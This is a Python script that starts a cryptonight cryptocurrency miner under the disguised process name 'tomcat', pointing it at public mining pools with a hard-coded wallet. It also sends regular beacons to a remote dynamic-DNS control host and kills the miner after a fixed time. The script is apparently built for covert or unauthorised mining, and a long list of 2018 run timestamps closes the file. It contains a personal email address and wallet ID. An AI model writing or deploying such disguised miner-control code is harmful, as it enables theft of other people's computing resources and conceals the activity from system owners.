import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:59:03.954632
#2018-02-17 16:47:04.063834
#2018-02-17 18:34:05.465690
#2018-02-17 20:22:03.441745
#2018-02-17 22:09:04.922744
#2018-02-17 23:53:06.719362
#2018-02-18 01:43:07.917067
#2018-02-18 03:29:06.745275
#2018-02-18 05:17:07.181091
#2018-02-18 07:09:06.166891
#2018-02-18 08:57:06.846776
#2018-02-18 10:44:06.011570
#2018-02-18 12:32:06.536263
#2018-02-18 14:19:07.592608
#2018-02-18 16:10:02.068311
#2018-02-18 17:57:06.946997
#2018-02-18 19:44:06.220061
#2018-02-18 21:31:05.439005
#2018-02-18 23:19:02.255570
#2018-02-19 01:07:06.592795
#2018-02-19 02:53:03.836146
#2018-02-19 04:41:06.977990
#2018-02-19 06:25:07.989812
#2018-02-19 08:14:08.023468
#2018-02-19 10:04:06.658154
#2018-02-19 11:53:08.681937
#2018-02-19 13:40:04.634604
#2018-02-19 15:27:07.394217
#2018-02-19 17:17:08.345543
#2018-02-19 19:04:03.900156
#2018-02-19 20:50:05.905850
#2018-02-19 22:37:07.531145
#2018-02-20 00:22:01.861821
#2018-02-20 02:10:04.398734
#2018-02-20 03:59:04.037991
#2018-02-20 05:44:02.062894
#2018-02-20 07:29:06.499973
#2018-02-20 09:14:03.971945
#2018-02-20 10:56:09.328055
#2018-02-20 12:44:08.594341
#2018-02-20 14:28:01.746736
#2018-02-20 16:12:01.569175
#2018-02-20 17:57:08.602611
#2018-02-20 19:48:05.934870
#2018-02-20 21:38:01.876736
#2018-02-20 23:19:06.574300
#2018-02-21 01:03:06.329434
#2018-02-21 02:51:07.532109
#2018-02-21 04:41:01.999925
#2018-02-21 06:28:07.702112
#2018-02-21 08:15:02.628776
#2018-02-21 10:03:01.422496
#2018-02-21 11:50:02.038764
#2018-02-21 13:40:09.904191
#2018-02-21 15:23:08.835645
#2018-02-21 17:15:08.792350
#2018-02-21 19:04:05.475105
#2018-02-21 20:51:01.518905
#2018-02-21 22:36:06.383335
#2018-02-22 00:25:09.792882
#2018-02-22 02:14:05.854943
#2018-02-22 03:59:06.634088
#2018-02-22 05:46:04.995346
#2018-02-22 07:31:05.902889
#2018-02-22 09:18:08.732137
#2018-02-22 11:05:08.619411
#2018-02-22 12:50:08.671082
#2018-02-22 14:36:09.508294
#2018-02-22 16:22:04.597859
#2018-02-22 18:08:06.318982
#2018-02-22 19:57:06.085946
#2018-02-22 21:48:07.424790
#2018-02-22 23:35:04.148214
#2018-02-23 01:22:07.395143
#2018-02-23 03:09:06.266821
#2018-02-23 04:57:06.379616
#2018-02-23 06:41:07.898095
#2018-02-23 08:31:05.554954
#2018-02-23 10:45:08.356937
#2018-02-23 12:43:04.572227
#2018-02-23 14:27:02.195493
#2018-02-23 16:19:04.689609
#2018-02-23 18:05:05.183620
#2018-02-23 19:51:08.282044
#2018-02-23 21:34:07.505469
#2018-02-23 23:22:04.795241
#2018-02-24 01:14:07.331743
#2018-02-24 03:06:05.320112
#2018-02-24 04:51:06.750543
#2018-02-24 06:34:06.879906
#2018-02-24 08:23:01.893957
#2018-02-24 10:06:06.109805
#2018-02-24 12:04:01.515221
#2018-02-24 13:51:06.969245
#2018-02-24 15:31:05.524990
#2018-02-24 17:24:07.395096
#2018-02-24 19:12:06.326421
#2018-02-24 21:00:01.838354
#2018-02-24 23:31:03.694644
#2018-02-25 02:54:06.852526
#2018-02-25 06:31:07.219470